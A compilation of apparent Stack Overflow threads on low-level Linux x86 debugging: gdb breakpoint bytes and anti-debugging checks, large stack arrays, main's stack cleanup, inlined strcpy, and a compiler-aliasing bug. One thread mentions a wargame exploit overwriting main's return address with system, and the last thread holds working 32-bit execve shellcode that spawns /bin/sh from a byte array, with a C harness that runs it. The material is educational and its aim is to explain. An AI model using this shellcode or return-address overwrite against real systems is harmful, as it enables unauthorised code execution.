Anti-debugging: gdb does not write 0xcc byte for breakpoints. Any idea why?

I am learning some anti-debugging techniques on Linux and found a snippet of code for checking 0xcc byte in memory to detect the breakpoints in gdb. Here is that code:
if ((*(volatile unsigned *)((unsigned)foo + 3) & 0xff) == 0xcc)
{
printf("BREAKPOINT\n");
exit(1);
}
foo();
But it does not work. I even tried to set a breakpoint on foo() function and observe the contents in memory, but did not see any 0xcc byte written for breakpoint. Here is what I did:
(gdb) b foo
Breakpoint 1 at 0x804846a: file p4.c, line 8.
(gdb) x/x 0x804846a
0x804846a <foo+6>: 0xe02404c7
(gdb) x/16x 0x8048460
0x8048460 <frame_dummy+32>: 0x90c3c9d0 0x83e58955 0x04c718ec 0x0485e024
0x8048470 <foo+12>: 0xfefae808 0xc3c9ffff .....
As you can see, there seems to be no 0xcc byte written on the entry point of foo() function. Does anyone know what's going on or where I might be wrong? Thanks.

The second part is easily explained (as Flortify correctly stated):
GDB shows the original memory contents, not the breakpoint "bytes". In its default mode it even removes the breakpoints when the debugger stops the program and re-inserts them before continuing. Users typically want to see their code, not the modified instructions used for breakpoints.
With your C code you missed the breakpoint by a few bytes. GDB sets the breakpoint after the function prologue, because the prologue is not typically what gdb users want to see. So if you put a break on foo, the actual breakpoint will typically be located a few bytes after the entry point (how many depends on the prologue, which differs per function, as it may or may not have to save the stack pointer, frame pointer and so on). In your session GDB reported the breakpoint at foo+6, while your check reads the byte at foo+3. This is easy to check. I used this code:
#include <stdio.h>
int main()
{
int i,j;
unsigned char *p = (unsigned char*)main;
for (j=0; j<4; j++) {
printf("%p: ",p);
for (i=0; i<16; i++)
printf("%.2x ", *p++);
printf("\n");
}
return 0;
}
If we run this program by itself it prints:
0x40057d: 55 48 89 e5 48 83 ec 10 48 c7 45 f8 7d 05 40 00
0x40058d: c7 45 f4 00 00 00 00 eb 5a 48 8b 45 f8 48 89 c6
0x40059d: bf 84 06 40 00 b8 00 00 00 00 e8 b4 fe ff ff c7
0x4005ad: 45 f0 00 00 00 00 eb 27 48 8b 45 f8 48 8d 50 01
Now we run it in gdb (output re-formatted for SO).
(gdb) break main
Breakpoint 1 at 0x400585: file ../bp.c, line 6.
(gdb) info break
Num Type Disp Enb Address What
1 breakpoint keep y 0x0000000000400585 in main at ../bp.c:6
(gdb) disas/r main,+32
Dump of assembler code from 0x40057d to 0x40059d:
0x000000000040057d (main+0): 55 push %rbp
0x000000000040057e (main+1): 48 89 e5 mov %rsp,%rbp
0x0000000000400581 (main+4): 48 83 ec 10 sub $0x10,%rsp
0x0000000000400585 (main+8): 48 c7 45 f8 7d 05 40 00 movq $0x40057d,-0x8(%rbp)
0x000000000040058d (main+16): c7 45 f4 00 00 00 00 movl $0x0,-0xc(%rbp)
0x0000000000400594 (main+23): eb 5a jmp 0x4005f0
0x0000000000400596 (main+25): 48 8b 45 f8 mov -0x8(%rbp),%rax
0x000000000040059a (main+29): 48 89 c6 mov %rax,%rsi
End of assembler dump.
This verifies that the program prints the correct bytes. It also shows that the breakpoint has been inserted at 0x400585 (that is, after the function prologue), not at the first instruction of the function.
If we now run the program under gdb (with run) and then "continue" after the breakpoint is hit, we get this output:
(gdb) cont
Continuing.
0x40057d: 55 48 89 e5 48 83 ec 10 cc c7 45 f8 7d 05 40 00
0x40058d: c7 45 f4 00 00 00 00 eb 5a 48 8b 45 f8 48 89 c6
0x40059d: bf 84 06 40 00 b8 00 00 00 00 e8 b4 fe ff ff c7
0x4005ad: 45 f0 00 00 00 00 eb 27 48 8b 45 f8 48 8d 50 01
This now shows 0xcc at 0x400585, that is main+8 (the ninth byte of main), exactly where GDB reported the breakpoint.

If your hardware supports it, GDB may be using Hardware Breakpoints, which do not patch the code.
While I have not confirmed this via any official docs, this page indicates that
By default, gdb attempts to use hardware-assisted break-points.
Since you indicate expecting 0xCC bytes, I'm assuming you're running on x86 hardware, as the int3 opcode is 0xCC. x86 processors have a set of debug registers DR0-DR3, where you can program the address of data to cause a breakpoint exception. DR7 is a bitfield which controls the behavior of the breakpoints, and DR6 indicates the status.
The debug registers can only be read/written from Ring 0 (kernel mode). That means that the kernel manages these registers for you (via the ptrace API, I believe.)
However, for the sake of anti-debugging, all hope is not lost! On Windows, the GetThreadContext API allows you to get (a copy) of the CONTEXT for a (stopped) thread. This structure includes the contents of the DRx registers. This question is about how to implement the same on Linux.

This may also be a white lie that GDB is telling you... there may be a breakpoint there in RAM but GDB has noted what was there beforehand (so it can restore it later) and is showing you that, instead of the true contents of RAM.
Of course, it could also be using Hardware Breakpoints, which is a facility available on some processors. Setting h/w breakpoints is done by telling the processor the address it should watch out for (and trigger a breakpoint interrupt if it gets hit by the program counter while executing code).

Related

Understanding array declaration in C

I'm trying to understand how the C Standard explains that the declaration can cause an error. Consider the following pretty simple code:
int main()
{
char test[1024 * 1024 * 1024];
test[0] = 0;
return 0;
}
Demo
This segfaults. But the following code does not:
int main()
{
char test[1024 * 1024 * 1024];
return 0;
}
Demo
But when I compiled it on my machine, the latter one segfaulted too. The main function looks like this:
00000000000008c6 <main>:
8c6: 55 push %rbp
8c7: 48 89 e5 mov %rsp,%rbp
8ca: 48 81 ec 20 00 00 40 sub $0x40000020,%rsp
8d1: 89 bd ec ff ff bf mov %edi,-0x40000014(%rbp) // <---HERE
8d7: 48 89 b5 e0 ff ff bf mov %rsi,-0x40000020(%rbp)
8de: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
8e5: 00 00
8e7: 48 89 45 f8 mov %rax,-0x8(%rbp)
8eb: 31 c0 xor %eax,%eax
8ed: b8 00 00 00 00 mov $0x0,%eax
8f2: 48 8b 55 f8 mov -0x8(%rbp),%rdx
8f6: 64 48 33 14 25 28 00 xor %fs:0x28,%rdx
8fd: 00 00
8ff: 74 05 je 906 <main+0x40>
901: e8 1a fe ff ff callq 720 <__stack_chk_fail@plt>
906: c9 leaveq
907: c3 retq
908: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1)
90f: 00
As far as I understand, the segfault occurs when executing mov %edi,-0x40000014(%rbp).
I tried to find the explanation in N1570, Section 6.7.9 Initialization, but it does not seem to be the relevant one.
So how does the Standard explain this behavior?
The result is implementation-dependent.
I can think of several reasons why the behaviour could differ:
The compiler sees that the variable isn't used and has no possible side effects, and optimizes it away (even without optimization levels).
The stack is resized on request. Since there are no writes to this variable yet, why resize the stack now?
Compilers don't have to use the stack for automatic storage. A compiler can allocate the memory using malloc and free it on exit. Using the heap would allow allocating 1 GB without issues.
The stack size is set at 1 GB :)

Does the main function of a C program ever reclaim the stack?

I am working through the OverTheWire wargames and one of my exploits overwrites the return address of main with the address of system. I have then used the fact that at the point main returns, esp is still pointing at one of my local variables and hence I can fill it with the command I want system to run (e.g. sh;#).
My confusion comes from that I thought functions in C reclaim the stack before returning and hence at the point the return address is called the stack pointer would be pointing at the return address rather than at the local variables. However, my exploit works so it seems that my stack pointer is pointing at the local variables when the return address is called.
The main thing I have noticed about this particular challenge compared to others is that it calls exit(0) at the end, instead of just ending, so the assembly doesn't end with leave, which may be the reason for this behaviour.
I haven't included the actual code since it's quite long and I was hoping there was a general explanation for what I am seeing, but please let me know if the assembly would be useful.
#include <stdio.h>
int main ( void )
{
printf("hello\n");
return(0);
}
The relevant parts of the disassembly:
0000000000400430 <main>:
400430: 48 83 ec 08 sub $0x8,%rsp
400434: bf d4 05 40 00 mov $0x4005d4,%edi
400439: e8 c2 ff ff ff callq 400400 <puts@plt>
40043e: 31 c0 xor %eax,%eax
400440: 48 83 c4 08 add $0x8,%rsp
400444: c3 retq
400445: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40044c: 00 00 00
40044f: 90 nop
0000000000400450 <_start>:
400450: 31 ed xor %ebp,%ebp
400452: 49 89 d1 mov %rdx,%r9
400455: 5e pop %rsi
400456: 48 89 e2 mov %rsp,%rdx
400459: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp
40045d: 50 push %rax
40045e: 54 push %rsp
40045f: 49 c7 c0 c0 05 40 00 mov $0x4005c0,%r8
400466: 48 c7 c1 50 05 40 00 mov $0x400550,%rcx
40046d: 48 c7 c7 30 04 40 00 mov $0x400430,%rdi
400474: e8 97 ff ff ff callq 400410 <__libc_start_main@plt>
400479: f4 hlt
40047a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1)
For the most part there is nothing special about main or printf; they are just functions that conform to the calling convention. As other SO questions show, the compiler sometimes adds extra stack setup or other calls when it sees main() that it would not add otherwise, but main is still a function that has to conform to the calling convention, as seen in this case, where the stack pointer is put back where it was found.
Before an operating system (Linux, Windows, MacOS, etc.) can even think about running a program, it needs to allocate some space for that program and tag that memory as belonging to it, in a way that depends on the features of the processor and the OS. Then it loads the program from whatever media and launches it at the entry point specified in the binary file and/or at a well-known entry point. A clean exit of the program causes the operating system to free that memory; .text, .data, .bss and the stack are the trivial cases, since they go away when their memory goes away. Other items that were allocated and associated with the program (open files, runtime-allocated non-stack memory, etc.) can and should also be freed; how that happens depends on the design of the OS and/or the C library.
In the above case the bootstrap code calls __libc_start_main, which calls main; when main returns, the C library passes its return value to exit(). The hlt after the call is only reached if __libc_start_main unexpectedly returns; since this is application code, not kernel code, executing it would trap. An explicit exit() should be no different than a printf() or puts() or fopen() or any other function that ultimately makes one or more syscalls to the operating system. All that you can possibly find for these types of operating systems (Linux, Windows, MacOS) is the syscall. The release of memory happens outside the program, since the program cannot control it; otherwise you would have a chicken-and-egg problem, with the program freeing the MMU tables it is using to free MMU tables.
Compile and disassemble just the object for main rather than the whole program:
0000000000000000 <main>:
0: 48 83 ec 08 sub $0x8,%rsp
4: bf 00 00 00 00 mov $0x0,%edi
9: e8 00 00 00 00 callq e <main+0xe>
e: 31 c0 xor %eax,%eax
10: 48 83 c4 08 add $0x8,%rsp
14: c3 retq
No surprise there: it is the same as before, and it is all we needed to see to understand that the stack is cleaned up before the return. It also shows that main is not special:
#include <stdio.h>
int notmain ( void )
{
printf("hello\n");
return(0);
}
0000000000000000 <notmain>:
0: 48 83 ec 08 sub $0x8,%rsp
4: bf 00 00 00 00 mov $0x0,%edi
9: e8 00 00 00 00 callq e <notmain+0xe>
e: 31 c0 xor %eax,%eax
10: 48 83 c4 08 add $0x8,%rsp
14: c3 retq
If you are asking about an exit() call inside main, then yes: execution never reaches main's return, so the stack pointer is still offset by whatever main's frame used. But if main calls a function, that function calls another, and the second one calls exit(), then the stack pointer is left at the second function's stack frame, plus the return address pushed by the call (this is x86), plus whatever exit()'s own stack frame adds. You cannot simply assume what the stack pointer is pointing at when exit() is called, if it is called. You would have to examine the disassembly around the call to exit(), plus the code of exit() and anything it calls, to work this out.

gdb breakpoint in shared library not working

So, I have the following c program:
#include <stdio.h>
#include <string.h>
int main(){
char arr[20];
//this is line 6
strcpy(arr,"Hello, world!\n");
printf(arr);
}
I compiled it using the following command:
gcc -g t2.c -o a2.out
After that I loaded it in gdb and tried setting breakpoints at line 6, at the strcpy function and at line 8. Sure enough, when setting the breakpoint at strcpy I got the following message : "Make breakpoint pending on future shared library load? (y or [n])". I answered "y" and got "Breakpoint 2 (strcpy) pending.".
After answering yes, and running through the program, Breakpoint 2 is never resolved, and the debugger jumps straight to Breakpoint 3 at printf.
I am using Intel syntax in my debugger. Other than that no custom settings. Can anyone tell why the Breakpoint at strcpy is never resolved?
Compilers such as gcc are deeply familiar with the semantics of string functions such as strcpy.
On x86-64 with your example, gcc 9 is generating inline assembly rather than a strcpy call even at -O0. The breakpoint should work for most other functions.
x86-64 disassembly generated with gcc-9 (no strcpy call):
0000000000000000 <main>:
0: 48 83 ec 28 sub rsp,0x28
4: 48 b8 48 65 6c 6c 6f 2c 20 77 movabs rax,0x77202c6f6c6c6548
e: bf 01 00 00 00 mov edi,0x1
13: 48 89 04 24 mov QWORD PTR [rsp],rax
17: b8 21 0a 00 00 mov eax,0xa21
1c: 48 89 e6 mov rsi,rsp
1f: 66 89 44 24 0c mov WORD PTR [rsp+0xc],ax
24: 31 c0 xor eax,eax
26: c7 44 24 08 6f 72 6c 64 mov DWORD PTR [rsp+0x8],0x646c726f
2e: c6 44 24 0e 00 mov BYTE PTR [rsp+0xe],0x0
33: e8 00 00 00 00 call 38 <main+0x38>
34: R_X86_64_PLT32 __printf_chk-0x4
38: 31 c0 xor eax,eax
3a: 48 83 c4 28 add rsp,0x28
3e: c3 ret

compiler over-optimization causing data run time and debugging inconsistency

I have the following code:
struct cre_eqEntry *
cre_eventGet(struct cre_eqObj *eq_obj)
{
struct cre_eqEntry *eqe = cre_queueTailNode(&eq_obj->q);
Memcpy(&tmpEqo, eq_obj, sizeof(struct cre_eqObj));
volatile u32 ddd = 0;
ddd = ((struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail))->evt;
CPUMemFenceReadWrite();
if (!ddd) {
tmp = eq_obj->q.tail;
assert(0);
return NULL;
}
}
It is a piece of kernel code. When I ran it, it failed at assert(0), so apparently ddd was 0. But when I used GDB to debug the core dump and printed out '((struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail))->evt', surprisingly, the value was not 0.
So I started to suspect a compiler over-optimization problem. Here is the disassembly:
00000000000047ec <cre_eventGet>:
47ec: 55 push %rbp
47ed: 48 89 fe mov %rdi,%rsi
47f0: ba 80 00 00 00 mov $0x80,%edx
47f5: 53 push %rbx
47f6: 48 89 fb mov %rdi,%rbx
47f9: 48 83 ec 18 sub $0x18,%rsp
47fd: 0f b7 6f 24 movzwl 0x24(%rdi),%ebp
4801: 0f b7 47 28 movzwl 0x28(%rdi),%eax
4805: 0f af e8 imul %eax,%ebp
4808: 48 63 ed movslq %ebp,%rbp
480b: 48 03 6f 18 add 0x18(%rdi),%rbp
480f: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # 4816 <cre_eventGet+0x2a>
4816: e8 00 00 00 00 callq 481b <cre_eventGet+0x2f>
481b: 0f b7 43 28 movzwl 0x28(%rbx),%eax
481f: 48 8b 53 18 mov 0x18(%rbx),%rdx
4823: c7 44 24 0c 00 00 00 movl $0x0,0xc(%rsp)
482a: 00
482b: c1 e0 02 shl $0x2,%eax
482e: 48 98 cltq
4830: 8b 04 02 mov (%rdx,%rax,1),%eax
4833: 89 44 24 0c mov %eax,0xc(%rsp)
4837: 0f ae f0 mfence
483a: 8b 44 24 0c mov 0xc(%rsp),%eax
483e: 85 c0 test %eax,%eax
4840: 74 14 je 4856 <cre_eventGet+0x6a>
As far as I can see, the assembly code does the same thing as the C code.
So now I ran out of ideas what is causing the problem of inconsistency of 'ddd'.
Please kindly give me some hints!
ddd = ((struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail))->evt;
Simplify your code. Perform address/boundary checks/validation. Your problem is likely that you are de-referencing some random, uninitialized, address within your process/thread's address space.
ddd = ((struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail))->evt; probably violates the strict aliasing rule (can't say 100% for sure without seeing the whole code).
If using gcc/clang, compile with -fno-strict-aliasing unless you want to rewrite your code to comply with the standard.
To do the latter, use memcpy((u32 *)&ddd, &((struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail))->evt, sizeof ddd); (note the extra parentheses: the cast must be applied before ->). I guess your codebase may have similar violations in many places, so as a first step, using the compiler flag would be a way to see if this really is the problem.
The magic number 4 is suspicious too, review your code to check if this really is the correct offset and also check that it is not out of bounds of allocated memory.

shellcode executes /bin/sh but not ./abcde

I am trying to run some shellcode on a server where I don't have access to the shell, but I have access to my own executable bash script.
My shellcode looks like this:
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
When I run it locally, the code spawns a shell. I can also run other commands such as /bin/ls. However, when I replace /bin/sh with ./abcde, it won't run my executable.
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";
What am I doing wrong? I am on a x86-32 machine..
EDIT:
To make it more clear, this is the scenario:
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
unsigned char code1[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";
int main(void){
void (*f)(void);
f = (void (*)(void))code; //works
f = (void (*)(void))code1; //Does NOT work
f();
}
Your program is not very portable as you include ia32 instructions in your strings. With some help from gdb it was easier to read:
(gdb) disassemble/r code,code1
Dump of assembler code from 0x804a040 to 0x804a080:
0x0804a040 <code+0>: eb 15 jmp 0x804a057 <code+23>
0x0804a042 <code+2>: 5b pop %ebx
0x0804a043 <code+3>: 31 c0 xor %eax,%eax
0x0804a045 <code+5>: 89 5b 08 mov %ebx,0x8(%ebx)
0x0804a048 <code+8>: 88 43 07 mov %al,0x7(%ebx)
0x0804a04b <code+11>: 8d 4b 08 lea 0x8(%ebx),%ecx
0x0804a04e <code+14>: 89 43 0c mov %eax,0xc(%ebx)
0x0804a051 <code+17>: 89 c2 mov %eax,%edx
0x0804a053 <code+19>: b0 0b mov $0xb,%al
0x0804a055 <code+21>: cd 80 int $0x80
0x0804a057 <code+23>: e8 e6 ff ff ff call 0x804a042 <code+2>
0x0804a05c <code+28>: 2f das
0x0804a05d <code+29>: 62 69 6e bound %ebp,0x6e(%ecx)
0x0804a060 <code+32>: 2f das
0x0804a061 <code+33>: 73 68 jae 0x804a0cb
0x0804a063 <code+35>: 00 00 add %al,(%eax)
0x0804a065: 00 00 add %al,(%eax)
0x0804a067: 00 00 add %al,(%eax)
0x0804a069: 00 00 add %al,(%eax)
0x0804a06b: 00 00 add %al,(%eax)
0x0804a06d: 00 00 add %al,(%eax)
0x0804a06f: 00 00 add %al,(%eax)
0x0804a071: 00 00 add %al,(%eax)
0x0804a073: 00 00 add %al,(%eax)
0x0804a075: 00 00 add %al,(%eax)
0x0804a077: 00 00 add %al,(%eax)
0x0804a079: 00 00 add %al,(%eax)
0x0804a07b: 00 00 add %al,(%eax)
0x0804a07d: 00 00 add %al,(%eax)
0x0804a07f: 00 eb add %ch,%bl
However, a helpful compiler puts the code in a variable segment, which will cause a segmentation fault when the processor jumps to the "string" and tries to execute from it.
I think this is a similar question:
sys_execve system call from Assembly
A careful reading of the question reveals what is actually going on. Indeed the compiler will happily bork you by placing this in a variable region; however the OS platform targeted probably doesn't have NX enabled (enabling NX on arbitrary 32 bit process was a recipe for disaster for a long time as GCC extensions required the stack to be executable).
The actual problem is you don't have execute access to bash. Your ./abcde is a bash script by your own admission, so the loader interprets #!/bin/bash, goes to open /bin/bash and discovers you don't have x permissions and barfs. exec() returns -Esomething with unpredictable results when you run off the end of the shellcode.
